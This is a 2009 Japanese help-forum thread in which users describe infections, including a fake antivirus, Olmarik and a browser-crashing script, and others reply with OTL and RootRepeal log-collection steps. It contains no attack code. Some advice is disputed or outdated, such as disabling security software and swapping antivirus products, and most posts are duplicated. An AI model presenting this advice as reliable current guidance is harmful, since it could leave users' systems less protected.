上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.txt」がメモ帳で開いて、デスクトップ上にテキストで自動的に保存されています
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
http://rootrepeal.googlepages.com/
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
183 :八頭 ◆YAGApwSaEw :2009/10/06(火) 23:30:53
Windowsの自動実行(オートラン)機能を無効にする した後、一度PC再起動
【スパイウェア対策ソフト】ad-aware spybot ← 2つとも保護機能をすべて解除してからアンインストールしておいて下さい
つづき
OTLとRootRepealのログを新規フォルダへコピー貼り付け移動して、フォルダを圧縮
圧縮フォルダ名を[ Report ] - Infection log reportとして以下へ提出
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
【スパイウェア対策ソフト】ad-aware spybot ← 2つとも保護機能をすべて解除してからアンインストールしておいて下さい
つづき
OTLとRootRepealのログを新規フォルダへコピー貼り付け移動して、フォルダを圧縮
圧縮フォルダ名を[ Report ] - Infection log reportとして以下へ提出
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
184 :名無しさん@お腹いっぱい。:2009/10/06(火) 23:31:13
>>168
ども。 oppai.htmlをaviraに判定依頼送ったら、JS/BrowserCrasher.A. (新種)って返事が来た。
って、検出名そのまんまかよ。(w
# まだVDFには反映されてません。 なんで、Virustotalは0/41のままです。 Avira一番乗りかな?
>>174
先日の時は、別にウイルスに感染する訳じゃなかったようなので、再起動して問題なければ大丈夫かと。
ただ、こういうブラウザの制御が効かなくなるヤツは、裏で新種マルウェアが組み込まれると厄介だから、お互い気をつけましょう。
ちなみに、googleの方はまだ対応してませんね。 amigo.inのサイトは生きているから、注意お願いします。
(googleは再送してみます。)
ども。 oppai.htmlをaviraに判定依頼送ったら、JS/BrowserCrasher.A. (新種)って返事が来た。
って、検出名そのまんまかよ。(w
# まだVDFには反映されてません。 なんで、Virustotalは0/41のままです。 Avira一番乗りかな?
>>174
先日の時は、別にウイルスに感染する訳じゃなかったようなので、再起動して問題なければ大丈夫かと。
ただ、こういうブラウザの制御が効かなくなるヤツは、裏で新種マルウェアが組み込まれると厄介だから、お互い気をつけましょう。
ちなみに、googleの方はまだ対応してませんね。 amigo.inのサイトは生きているから、注意お願いします。
(googleは再送してみます。)
186 :名無しさん@お腹いっぱい。:2009/10/07(水) 16:59:21
フリーソフトを入れるとPC壊れるって書いてるやつがwww
こんなこと本気で思ってんのかこいつwww
それにしても頓珍漢な回答するやつも多いなwww
ttp://oshiete.filesend.to/qa5301829.html
こんなこと本気で思ってんのかこいつwww
それにしても頓珍漢な回答するやつも多いなwww
ttp://oshiete.filesend.to/qa5301829.html
187 : ◆N9P3SuvBPo :2009/10/07(水) 21:36:18
>186
専門家と名乗ってる人ですよね。
フリーソフトがuser.dllだか、kernel32.dllを削除したせいで、OSが壊れてしまった…と。
普通、専門家の方なら誤検出を予測するでしょう。
専門家と名乗ってる人ですよね。
フリーソフトがuser.dllだか、kernel32.dllを削除したせいで、OSが壊れてしまった…と。
普通、専門家の方なら誤検出を予測するでしょう。
188 :名無しさん@お腹いっぱい。:2009/10/07(水) 22:18:09
メールがたくさん送りつけられるウィルスって何なのでしょうか?
189 :名無しさん@お腹いっぱい。:2009/10/07(水) 23:36:03
2009/10/07 22:35:17
スタートアップ検査
システムメモリに入り込んだ
Win32/Olmarik
トロイの木馬を
駆除できません
くぐっても情報が無いので分かる方
教えを下さい
スタートアップ検査
システムメモリに入り込んだ
Win32/Olmarik
トロイの木馬を
駆除できません
くぐっても情報が無いので分かる方
教えを下さい
190 :八頭 ◆YAGApwSaEw :2009/10/07(水) 23:46:47
>>189
これだけ教えてくれるかな
【使用OS】 『』 例、Vista sp3 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
これだけ教えてくれるかな
【使用OS】 『』 例、Vista sp3 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
191 :名無しさん@お腹いっぱい。:2009/10/07(水) 23:55:23
【使用OS】 『Microsoft Windows XP Home Edition』
【使用ブラウザ】『OperaTor』
【Microsoft Updateの更新の状態】『自動更新設定』
【セキュリティソフトと年式】『ESET NOD32 Antivirus』
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』
【回線の種類・ルータの有無】『ADSL回線』
CPU名 Intel(R) Pentium(R) M processor 1.60GHz
物理メモリ空き容量 32 MB
ページファイル空き容量 614 MB
仮想メモリ空き容量 1997 MB
192 :八頭 ◆YAGApwSaEw :2009/10/08(木) 00:02:48
【セキュリティソフトと年式】『ESET NOD32 Antivirus』 → アンインストールしてNIS2010体験版に入れ替える
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』 → 保護機能を解除してからアンインストール
ノートンシリーズの体験版 (*30日間すべての機能を利用できます)
http://www.symantecstore.jp/trial/index.asp
Spybotの代わりに「a-squared Free 4.5」と「Avira AntiVir Personal 8」 を導入する
http://pc11.2ch.net/test/read.cgi/sec/1254665067/8
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』 → 保護機能を解除してからアンインストール
ノートンシリーズの体験版 (*30日間すべての機能を利用できます)
http://www.symantecstore.jp/trial/index.asp
Spybotの代わりに「a-squared Free 4.5」と「Avira AntiVir Personal 8」 を導入する
http://pc11.2ch.net/test/read.cgi/sec/1254665067/8
193 :名無しさん@お腹いっぱい。:2009/10/08(木) 00:13:20
低スペックにノートンはきついので
Spybotの代わりに「a-squared Free 4.5で検査してきます
有り難う御座いました。
194 :八頭 ◆YAGApwSaEw :2009/10/08(木) 00:22:17
a-squared Free 4.5が一番重いよw
195 : ◆N9P3SuvBPo :2009/10/08(木) 02:02:14
>189
リカバリしましょう。
ついでに192は根本的に間違ってますのでしないように。
192は常駐型アンチウイルスの同居を奨めています!
本気で助けたいと思うのなら、既存のセキュリティソフトを消せとか言いませんよ、普通は!
リカバリしましょう。
ついでに192は根本的に間違ってますのでしないように。
192は常駐型アンチウイルスの同居を奨めています!
本気で助けたいと思うのなら、既存のセキュリティソフトを消せとか言いませんよ、普通は!
196 :八頭 ◆YAGApwSaEw :2009/10/08(木) 02:39:47
>>◆N9P3SuvBPo
>システムメモリに入り込んだ とあるからね
悪党はリカバリ退避まで見越しているんじゃないの?
http://pc11.2ch.net/test/read.cgi/sec/1254665067/8
それから、ここのはすべて組み合わせてウチで併用確認済みだよ
>システムメモリに入り込んだ とあるからね
悪党はリカバリ退避まで見越しているんじゃないの?
http://pc11.2ch.net/test/read.cgi/sec/1254665067/8
それから、ここのはすべて組み合わせてウチで併用確認済みだよ
197 :八頭 ◆YAGApwSaEw :2009/10/08(木) 02:45:57
>>◆N9P3SuvBPo
ttp://i.imagehost.org/0700/WS006856.jpg
ttp://i.imagehost.org/0700/WS006856.jpg
198 :名無しさん@お腹いっぱい。:2009/10/08(木) 12:21:13
★質問用テンプレ★
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「norton Internet Security 2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「スパイボット」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「していない」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
『ノートンがHDDの\Windows\temp\_ex08.exeにpacked Genericを検出し遮断してすぐ覚えのないセキュリティソフトが起動したので回線を切って再起動したところ
またそのセキュリティソフトが起動し下のリンクの携帯でとったスクリーンショットのようにウイルスがあるとのこと。
そのソフトが。右下にIE、FireFox、Outlookからパスワードをとるウイルスをみつけた的なことを英語で言う
タスクマネージャで12038418.exeが何かしていると思いよくみたら、HDDのC\Document and setting\all users\Application Data\12038418のフォルダにあり、
上記のよくわからないセキュリティソフトのアイコンでした』
【その他】 『Yahoo!ニュースでパスワードを持っていくウイルスが活躍中なのをみかけました』
【スクリーンショット】
ttp://i.imagehost.org/view/0733/091008_102555
どうするのがよいでしょうか
スクショのセキュリティソフトは信用していいのでしょうか?
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「norton Internet Security 2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「スパイボット」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「していない」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
『ノートンがHDDの\Windows\temp\_ex08.exeにpacked Genericを検出し遮断してすぐ覚えのないセキュリティソフトが起動したので回線を切って再起動したところ
またそのセキュリティソフトが起動し下のリンクの携帯でとったスクリーンショットのようにウイルスがあるとのこと。
そのソフトが。右下にIE、FireFox、Outlookからパスワードをとるウイルスをみつけた的なことを英語で言う
タスクマネージャで12038418.exeが何かしていると思いよくみたら、HDDのC\Document and setting\all users\Application Data\12038418のフォルダにあり、
上記のよくわからないセキュリティソフトのアイコンでした』
【その他】 『Yahoo!ニュースでパスワードを持っていくウイルスが活躍中なのをみかけました』
【スクリーンショット】
ttp://i.imagehost.org/view/0733/091008_102555
どうするのがよいでしょうか
スクショのセキュリティソフトは信用していいのでしょうか?
199 :名無しさん@お腹いっぱい。:2009/10/08(木) 13:34:31
200 :名無しさん@お腹いっぱい。:2009/10/08(木) 15:11:19
>>199ありがとうございます。
シマンテックに提出したところ、
We have analyzed your submission. The following is a report of our
findings for each file you have submitted:
filename: [ Report ] - Infection log report.zip
machine: Machine
result: See the developer notes
filename: 12038418.exe
machine: Machine
result: This file is detected as Suspicious.S.MLApp.
filename: 12038418.cfg
machine: Machine
result: See the developer notes
Customer notes:
Developer notes:
[ Report ] - Infection log report.zip is a container file of type ZIP
12038418.exe reserves one slot in Tier 1 for future malicious behavior category This file is contained by [ Report ] - Infection log report.zip
12038418.cfg Our automation was unable to identify any malicious content in this submission.
The file will be stored for further human analysis This file is contained by [ Report ] - Infection log report.zip
Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.
とメールがきたのですがこれはどういう意味でしょうか・・・?
シマンテックに提出したところ、
We have analyzed your submission. The following is a report of our
findings for each file you have submitted:
filename: [ Report ] - Infection log report.zip
machine: Machine
result: See the developer notes
filename: 12038418.exe
machine: Machine
result: This file is detected as Suspicious.S.MLApp.
filename: 12038418.cfg
machine: Machine
result: See the developer notes
Customer notes:
Developer notes:
[ Report ] - Infection log report.zip is a container file of type ZIP
12038418.exe reserves one slot in Tier 1 for future malicious behavior category This file is contained by [ Report ] - Infection log report.zip
12038418.cfg Our automation was unable to identify any malicious content in this submission.
The file will be stored for further human analysis This file is contained by [ Report ] - Infection log report.zip
Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.
とメールがきたのですがこれはどういう意味でしょうか・・・?
201 :名無しさん@お腹いっぱい。:2009/10/08(木) 15:20:16
英語で帰ってくんのかよ
202 :名無しさん@お腹いっぱい。:2009/10/08(木) 17:36:01
専門用語とかはいってたらお手上げだよなぁ・・・
203 :八頭 ◆YAGApwSaEw :2009/10/08(木) 20:53:30
204 :名無しさん@お腹いっぱい。:2009/10/08(木) 21:34:05
>>203ログはしてないです。最初に自動実行やめて再起動してしまったのでよくわからないけどログはのこってないのかとおもって・・・
205 :八頭 ◆YAGApwSaEw :2009/10/08(木) 22:07:04
他にも感染があったかもしれないからログで診てもらえばよかったのに・・・
Nortonスレのテンプレも読んどいてね
Nortonスレのテンプレも読んどいてね
206 : ◆N9P3SuvBPo :2009/10/09(金) 00:26:04
>196
a-squared Free 4.5はともかく
Avira AntiVir Personal 9と併用しても問題ないと。
a-squared Free 4.5はともかく
Avira AntiVir Personal 9と併用しても問題ないと。
207 :名無しさん@お腹いっぱい。:2009/10/09(金) 01:36:02
>>205いまからやってもおそいですか?
208 : ◆N9P3SuvBPo :2009/10/09(金) 01:44:34
209 :198:2009/10/09(金) 03:35:07
>>208やっぱりリカバリですか・・・
12038418.exeをスタートアップから外したら見た目は問題なくなったんですけどやっぱりまだなにかあるかもしれないですよね
でも家族で共用のPCなので、自分以外が使ったときに今までと違うことがあったら対処できるのかもしんぱいです。
しかし仕事のファイルも作成したりすることがあるのでリカバリかなぁ・・・・
12038418.exeをスタートアップから外したら見た目は問題なくなったんですけどやっぱりまだなにかあるかもしれないですよね
でも家族で共用のPCなので、自分以外が使ったときに今までと違うことがあったら対処できるのかもしんぱいです。
しかし仕事のファイルも作成したりすることがあるのでリカバリかなぁ・・・・
210 :名無しさん@お腹いっぱい。:2009/10/09(金) 07:13:37
>>209
なおさらリカバリしなきゃダメです
なおさらリカバリしなきゃダメです
211 :名無しさん@お腹いっぱい。:2009/10/09(金) 16:50:41
>>209
もういないかな?
私も海外サイトを見ていたら、>>198と同じソフトが突然起動しはじめました。
ノートンでスキャンを実行すると「W32.Waledac」が検出されて削除。
この偽ソフト自体はセーフモードで削除しました。
偽ソフトの画像で検索すると↓下記の記事を見つけたけど、exeの名前とか微妙に違う。。
http://www.411-spyware.com/remove-securitytool
連休はリカバリするか・・・
もういないかな?
私も海外サイトを見ていたら、>>198と同じソフトが突然起動しはじめました。
ノートンでスキャンを実行すると「W32.Waledac」が検出されて削除。
この偽ソフト自体はセーフモードで削除しました。
偽ソフトの画像で検索すると↓下記の記事を見つけたけど、exeの名前とか微妙に違う。。
http://www.411-spyware.com/remove-securitytool
連休はリカバリするか・・・
212 :名無しさん@お腹いっぱい。:2009/10/09(金) 17:51:33
>>211
感染の心当たりはありますか?
感染の心当たりはありますか?
213 :名無しさん@お腹いっぱい。:2009/10/09(金) 18:56:27
214 :名無しさん@お腹いっぱい。:2009/10/09(金) 21:01:08
>>211こちらはノートン2010で完全スキャンかけてもなにもなかったんですけどねぇ
exeファイルのみをスキャンしてみても異常なしでした
いまから購入時の状態に戻します
ちなみに自分は中華サイトみてたら壁紙が灰色になってウイルス発見!って・・・
スタートアップやデスクトップにショートカットまでつくるなんてやるなぁ
信用してたらどうなってたのか怖い怖い
exeファイルのみをスキャンしてみても異常なしでした
いまから購入時の状態に戻します
ちなみに自分は中華サイトみてたら壁紙が灰色になってウイルス発見!って・・・
スタートアップやデスクトップにショートカットまでつくるなんてやるなぁ
信用してたらどうなってたのか怖い怖い
215 :名無しさん@お腹いっぱい。:2009/10/09(金) 21:06:51
>>213
ありがd
ありがd
ってよく読んだら偽のウイルスセキュリティソフトを購入させる気だったんですね
情報持って行くタイプでなかったからまだよかったけど、exe起動させられたからオルタナティブとかも起動させられたりできそうだな・・・
情報持って行くタイプでなかったからまだよかったけど、exe起動させられたからオルタナティブとかも起動させられたりできそうだな・・・
217 :名無しさん@お腹いっぱい。:2009/10/10(土) 22:31:15
他の掲示板でも質問させてもらったですが、至急回答が欲しいのでこちらでも失礼します。
ウィルスなのかわからないのですが、
深夜2時に自動でPCが起動してしまって、音楽といーっひひとずっと子供の笑い声が響きます。
怖くなってしまい、すぐ電源を落としてしまったのですが、
一体原因は何なのでしょうか
ウィルスなのかわからないのですが、
深夜2時に自動でPCが起動してしまって、音楽といーっひひとずっと子供の笑い声が響きます。
怖くなってしまい、すぐ電源を落としてしまったのですが、
一体原因は何なのでしょうか
218 : ◆N9P3SuvBPo :2009/10/10(土) 22:52:41
「マルチ」というわけですね。
219 :名無しさん@お腹いっぱい。:2009/10/10(土) 23:24:25
220 :名無しさん@お腹いっぱい。:2009/10/11(日) 09:54:30
>>217
電源の切れたPCを勝手に立ち上げるマルウェア(ウイルス)は聞いたことがないが...
電源が入るのは、単に、BIOSの設定で Wake on LAN とか Wake on Ring みたいな
Wake on 〜がONになっていて、それが動作しただけの気がする。
音楽と子供の笑い声は、実際どんなモンが再生されたのか不明なんで何とも。
(聞いたことある音楽なのか、心当たりのない音楽なのかで判断違うし)
気になるなら、まずはシマンテック,マカフィー,カスペあたりのオンラインスキャンを
やってみれば良いと思うよん。
電源の切れたPCを勝手に立ち上げるマルウェア(ウイルス)は聞いたことがないが...
電源が入るのは、単に、BIOSの設定で Wake on LAN とか Wake on Ring みたいな
Wake on 〜がONになっていて、それが動作しただけの気がする。
音楽と子供の笑い声は、実際どんなモンが再生されたのか不明なんで何とも。
(聞いたことある音楽なのか、心当たりのない音楽なのかで判断違うし)
気になるなら、まずはシマンテック,マカフィー,カスペあたりのオンラインスキャンを
やってみれば良いと思うよん。
221 :八頭 ◆YAGApwSaEw :2009/10/11(日) 11:56:05
>>217
Bad Joke系は何故かAntiVirが強い
Avira AntiVir Personal (無料版)
ttp://www.free-av.com/en/download/download_servers.php
設定ポイント
ttp://i.imagehost.org/0302/WS006858.jpg
Bad Joke系は何故かAntiVirが強い
Avira AntiVir Personal (無料版)
ttp://www.free-av.com/en/download/download_servers.php
設定ポイント
ttp://i.imagehost.org/0302/WS006858.jpg
222 :名無しさん@お腹いっぱい。:2009/10/12(月) 00:20:25
【使用OS】 「windowsvista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「ADSL回線」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「毎日検索しているのですが、
毎回cookie_Doubliclickとcookie_overtureと言うものが検出されます、
削除しましたと出てきますが、検索したらほぼ毎回検出されます、これはウィルスなのでしょうか?
初心者で大変申し訳ないのですが、よろしくお願い致します」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「ADSL回線」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「毎日検索しているのですが、
毎回cookie_Doubliclickとcookie_overtureと言うものが検出されます、
削除しましたと出てきますが、検索したらほぼ毎回検出されます、これはウィルスなのでしょうか?
初心者で大変申し訳ないのですが、よろしくお願い致します」
223 :名無しさん@お腹いっぱい。:2009/10/12(月) 00:32:27
cookie_Doubliclickとcookie_overtureを
グーグル検索すれば解決するんじゃないかな
グーグル検索すれば解決するんじゃないかな
224 :名無しさん@お腹いっぱい。:2009/10/12(月) 00:41:36
225 :名無しさん@お腹いっぱい。:2009/10/12(月) 23:58:55
<div style="display:none">iaadaacxfsvljiejsvakfhwmadlrwbo</div>というように
謎の31文字が埋め込まれるiframe型の改竄って、まとめて検出名ついていますか?
謎の31文字が埋め込まれるiframe型の改竄って、まとめて検出名ついていますか?
あくまでも不正サイトから何をダウンロードするか、であって、
改竄されているページに対しての名称はないみたいですね。。。
改竄されているページに対しての名称はないみたいですね。。。
227 :名無しさん@お腹いっぱい。:2009/10/15(木) 04:47:54
パソコンの右クリックが全く出来なくなってしまいました…
たぶんFLASHのゲームやったからなったとおもうんですけど……
インターネットの線は抜いたんですけど共有ルーター使ってるんでとても不安です
フォーマットしたほうがいいでしょうか?
たぶんFLASHのゲームやったからなったとおもうんですけど……
インターネットの線は抜いたんですけど共有ルーター使ってるんでとても不安です
フォーマットしたほうがいいでしょうか?
228 :名無しさん@お腹いっぱい。:2009/10/15(木) 04:55:42
↑左クリックでしたm(__)m
右クリックでメニューは出来ますが開けません…
右クリックでメニューは出来ますが開けません…
229 :名無しさん@お腹いっぱい。:2009/10/15(木) 14:58:22
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
230 :名無しさん@お腹いっぱい。:2009/10/19(月) 14:28:49
きちんと対策を行ったつもりなのですが、心配なので質問させて下さい。
【os】windows xp
【アップデートの状態】最新
【セキュリティソフト】ウィルスセキュリティゼロ/最新の状態(更新も頻繁に行っています)
【ルータの有無】有
ウィルスセキュリティにてスキャン中、「in the backdoor」と表示され、
怖くなって詳細を確認したところ、ファイル名「jword2.exe」と表示されました。
隔離されたのですが、心配なので削除を行い、
ノートンのオンラインスキャン→ウィルス検出されず
後、ウィルスセキュリティにて再度スキャン→検出されず
というような結果でした。ウィルスは完全に抹消されたと思っていいのでしょうか?
初心者ゆえ拙い文章ですみません。よろしくお願いします。
【os】windows xp
【アップデートの状態】最新
【セキュリティソフト】ウィルスセキュリティゼロ/最新の状態(更新も頻繁に行っています)
【ルータの有無】有
ウィルスセキュリティにてスキャン中、「in the backdoor」と表示され、
怖くなって詳細を確認したところ、ファイル名「jword2.exe」と表示されました。
隔離されたのですが、心配なので削除を行い、
ノートンのオンラインスキャン→ウィルス検出されず
後、ウィルスセキュリティにて再度スキャン→検出されず
というような結果でした。ウィルスは完全に抹消されたと思っていいのでしょうか?
初心者ゆえ拙い文章ですみません。よろしくお願いします。
231 :名無しさん@お腹いっぱい。:2009/10/19(月) 19:25:21
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2010」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「総合検索は初期状態の一ヶ月に1回程度」
【ルータの有無】ADSL回線 モデムは富士通W4
検索をかけたらサミー777からウィルスが2個出てきた。
結局削除する羽目になったが駆除できなかった
これはサミーに問い合わせたほうがいいのかな
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2010」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「総合検索は初期状態の一ヶ月に1回程度」
【ルータの有無】ADSL回線 モデムは富士通W4
検索をかけたらサミー777からウィルスが2個出てきた。
結局削除する羽目になったが駆除できなかった
これはサミーに問い合わせたほうがいいのかな
232 :八頭 ◆YAGApwSaEw :2009/10/19(月) 19:58:35
>>230
PC健康診断掲示板 で診てもらえばいいよ
http://pc11.2ch.net/test/read.cgi/sec/1250027233/5
>>231
サミー777について詳しく
連絡は信頼出来る第三者を介したほうがいいかも
http://pc11.2ch.net/test/read.cgi/sec/1250027233/6
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
PC健康診断掲示板 で診てもらえばいいよ
http://pc11.2ch.net/test/read.cgi/sec/1250027233/5
>>231
サミー777について詳しく
連絡は信頼出来る第三者を介したほうがいいかも
http://pc11.2ch.net/test/read.cgi/sec/1250027233/6
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
233 : ◆N9P3SuvBPo :2009/10/19(月) 21:19:33
>230
jwordというプログラムがインストールされてませんか?
(あの人はただ不安を煽ってるだけなので)
jwordというプログラムがインストールされてませんか?
(あの人はただ不安を煽ってるだけなので)
234 :名無しさん@お腹いっぱい。:2009/10/19(月) 23:54:38
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー 最新」
【ルータの有無】 「ADSL たまに無線LAN」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「特になし。」
私はパソコン初心者です。どこに相談したら良いか分からず、こちらに相談させていただきます。
もしスレチなら、ベストな板へ誘導して頂けると助かります。
昨日Eメールを開いたら、見慣れないところから怪しいメールが2件。
1000万円の手続きが完了しました、とか、10月無料手続き完了。200万円の手続きが完了しました。
とか。
1件は私の名前がフルネームで記載されていて、「○○(私の名前)様!」と。
つまり、名前とパソコンの本アドが漏れているということ。
とても怖いです。
それから、最近気になるのは、2ちゃんなどで書き込みしてて、文章打ってる途中で
勝手に変に変換されたり、変なところで区切れて無変換になったり、カーソルが勝手に
飛んで、打ってる途中で文章が変な所に打ち込みささったり。
私は、ネットウィルスにでも感染して、パソコンがおかしくなっているのでは?
ウィルスが原因で、どこかから情報が漏れたりしているのでは?と不安なのですが、
職場の上司に「ハッキングじゃないの?」
と言われ、どのように対応したら良いか、非常に焦っています。
最近ネットで買い物したり、占いや相談サイトへの無料登録などで、パソコンの本アド
を登録することが多かったので、そういうところから漏れているのでしょうか?
特にウィルス検査でも引っ掛からないのですが・・・。
誰かアドバイスいただけると助かります。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー 最新」
【ルータの有無】 「ADSL たまに無線LAN」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「特になし。」
私はパソコン初心者です。どこに相談したら良いか分からず、こちらに相談させていただきます。
もしスレチなら、ベストな板へ誘導して頂けると助かります。
昨日Eメールを開いたら、見慣れないところから怪しいメールが2件。
1000万円の手続きが完了しました、とか、10月無料手続き完了。200万円の手続きが完了しました。
とか。
1件は私の名前がフルネームで記載されていて、「○○(私の名前)様!」と。
つまり、名前とパソコンの本アドが漏れているということ。
とても怖いです。
それから、最近気になるのは、2ちゃんなどで書き込みしてて、文章打ってる途中で
勝手に変に変換されたり、変なところで区切れて無変換になったり、カーソルが勝手に
飛んで、打ってる途中で文章が変な所に打ち込みささったり。
私は、ネットウィルスにでも感染して、パソコンがおかしくなっているのでは?
ウィルスが原因で、どこかから情報が漏れたりしているのでは?と不安なのですが、
職場の上司に「ハッキングじゃないの?」
と言われ、どのように対応したら良いか、非常に焦っています。
最近ネットで買い物したり、占いや相談サイトへの無料登録などで、パソコンの本アド
を登録することが多かったので、そういうところから漏れているのでしょうか?
特にウィルス検査でも引っ掛からないのですが・・・。
誰かアドバイスいただけると助かります。
235 :名無しさん@お腹いっぱい。:2009/10/20(火) 09:34:21
>>230です
>>233
はい。necのパソコンなので、買った当初からインストールされておりました。
Jwordは特に使っている機能でもないので、ウィルスを発見した時点でアンインストールしてしまったのですが…。
>>233
はい。necのパソコンなので、買った当初からインストールされておりました。
Jwordは特に使っている機能でもないので、ウィルスを発見した時点でアンインストールしてしまったのですが…。
236 :八頭 ◆YAGApwSaEw :2009/10/20(火) 19:16:05
>>234
OTL.exeとRootRepealをデスクトップ上にダウンロードして、
ネットケーブルを抜いてからPCを一度再起動して、ネット非接続のままでログ抽出してみて
http://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック > ログ抽出走査がスタート
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
http://rootrepeal.googlepages.com/
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > ログ抽出走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
OTL.exeとRootRepealをデスクトップ上にダウンロードして、
ネットケーブルを抜いてからPCを一度再起動して、ネット非接続のままでログ抽出してみて
http://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック > ログ抽出走査がスタート
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
http://rootrepeal.googlepages.com/
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
